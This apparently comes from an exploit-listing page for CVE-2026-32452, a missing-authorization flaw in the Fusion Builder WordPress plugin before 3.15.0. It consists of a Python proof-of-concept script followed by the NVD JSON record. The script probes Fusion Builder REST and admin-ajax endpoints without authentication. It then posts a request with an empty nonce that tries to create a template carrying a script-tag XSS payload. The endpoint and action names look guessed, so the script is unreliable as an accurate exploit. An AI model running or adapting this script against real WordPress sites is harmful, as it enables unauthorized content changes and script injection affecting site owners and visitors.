CVE-2026-32452

import requests # CVE-2026-32452 PoC - Missing Authorization in Fusion Builder # Target: WordPress site with Fusion Builder < 3.15.0 target_url = "http://target-wordpress-site.com" # PoC 1: Check if target is vulnerable by accessing Fusion Builder endpoint def check_vulnerability(): # Try to access Fusion Builder API without authentication endpoints = [ "/wp-json/fusion-builder/v1/elements", "/wp-admin/admin-ajax.php?action=fusion_builder_ajax", "/wp-json/fusion-builder/v1/templates", "/wp-json/fusion-builder/v1/shortcodes" ] for endpoint in endpoints: url = target_url + endpoint try: response = requests.get(url, timeout=10) # If we get a 200 response without auth, vulnerability exists if response.status_code == 200: print(f"[+] Vulnerable endpoint found: {url}") print(f"[+] Response: {response.text[:500]}") return True else: print(f"[-] Endpoint {url} returned: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {url}: {e}") return False # PoC 2: Attempt to create/modify content via Fusion Builder def exploit_builder_access(): # Construct malicious request to Fusion Builder API exploit_payload = { 'action': 'fusion_builder_ajax', 'fusion_builder_nonce': '', # May be empty if nonce check is missing 'fusion_action': 'create_element', 'element': 'fusion_template', 'data': '{"content":"<script>alert(\"XSS\")</script>"}' } url = target_url + "/wp-admin/admin-ajax.php" try: response = requests.post(url, data=exploit_payload, timeout=10) if response.status_code == 200 and 'fusion' in response.text.lower(): print("[+] Successfully accessed Fusion Builder without authorization") print(f"[+] Response: {response.text[:500]}") return True except requests.exceptions.RequestException as e: print(f"[-] Exploit failed: {e}") return False if __name__ == "__main__": print("[*] CVE-2026-32452 PoC - Fusion Builder Missing Authorization") print("[*] Target:", target_url) check_vulnerability() exploit_builder_access()

{"cve": {"id": "CVE-2026-32452", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:06.580", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in ThemeFusion Fusion Builder fusion-builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Fusion Builder: from n/a through < 3.15.0."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en ThemeFusion Fusion Builder fusion-builder permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Fusion Builder: desde n/a hasta &lt; 3.15.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/fusion-builder/vulnerability/wordpress-fusion-builder-plugin-3-15-0-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}